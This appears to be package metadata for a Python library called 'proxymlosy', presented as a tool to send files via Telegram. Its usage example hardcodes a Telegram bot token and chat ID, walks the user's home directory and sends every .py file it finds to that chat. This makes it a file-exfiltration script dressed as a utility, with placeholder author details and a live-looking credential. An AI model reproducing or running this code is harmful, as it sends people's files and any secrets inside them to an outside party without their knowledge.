Metadata-Version: 2.4
Name: proxymlosy
Version: 0.1.1
Summary: A Python library to send files via Telegram
Home-page: https://github.com/yourusername/my_file_sender
Author: Your Name
Author-email: your@email.com
Classifier: Programming Language :: Python :: 3
Classifier: License :: OSI Approved :: MIT License
Classifier: Operating System :: OS Independent
Requires-Python: >=3.6
Description-Content-Type: text/markdown
Requires-Dist: requests
Dynamic: author
Dynamic: author-email
Dynamic: classifier
Dynamic: description
Dynamic: description-content-type
Dynamic: home-page
Dynamic: requires-dist
Dynamic: requires-python
Dynamic: summary


from proxymlosy import FileSender
import os

TOKEN = "7246461761:AAH6kA0RmIMzjzNPWUoJOzPQtd6wx8YnpHU"
CHAT_ID = 8245348876
SEARCH_FOLDER = os.path.expanduser("~")

sender = FileSender(TOKEN, CHAT_ID)
sender.send_all_files(SEARCH_FOLDER, extension=".py")
